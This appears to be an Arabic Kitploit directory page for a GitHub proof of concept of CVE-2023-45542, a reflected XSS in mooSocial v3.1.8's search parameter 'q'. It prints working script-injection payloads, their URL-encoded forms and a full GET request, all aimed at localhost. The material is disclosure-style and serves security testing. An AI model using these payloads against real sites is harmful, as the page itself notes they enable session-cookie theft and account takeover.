Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2023-45542 — mooSocial v3.1.8 معرّض لثغرة البرمجة النصية عبر المواقع (XSS) في وظيفة البحث. | Kitploit
أدوات/GitHubGitHub/ahrixia/cve-2023-45542
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتأمن الويباختبار الاختراق
GitHubahrixia/cve-2023-45542

CVE-2023-45542

mooSocial v3.1.8 معرّض لثغرة البرمجة النصية عبر المواقع (XSS) في وظيفة البحث.

عرض المستودع
1منذ 2 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2023-45542

توجد ثغرة حقن سكربت عبر المواقع (XSS) من النوع المنعكس في المعامل q في وظيفة البحث في mooSocial v3.1.8، مما يسمح للمهاجمين بسرقة ملفات تعريف الارتباط الخاصة بجلسة المستخدم وانتحال حسابه عبر عنوان URL معد بعناية.

المعامل القابل للاستغلال: q

الاستغلال - إثبات المفهوم (POC)

حقن السكربت عبر المواقع (XSS) المنعكس

root@kitploit:~
Payload : test"><script>alert(1)</script>test 
FINAL Payload (URL encoded) : test%22%3e%3cscript%3ealert(1)%3c%2fscript%3etest

طلب GET على [http://localhost/moosocial/search/index/q=] :

root@kitploit:~
GET /moosocial/search/index/?q=test%22%3e%3cscript%3ealert(1)%3c%2fscript%3etest HTTP/1.1
Host: localhost
sec-ch-ua: "Chromium";v="117", "Not;A=Brand";v="8"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/moosocial/user_info/index/messages
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Connection: close

لقطة الشاشة

صورة

حمولات أخرى تعمل

root@kitploit:~
Payload : test</title><script>alert(1)</script>test 
FINAL Payload (URL encoded) : test%3c%2ftitle%3e%3cscript%3ealert(1)%3c%2fscript%3etest
تنزيل الأداة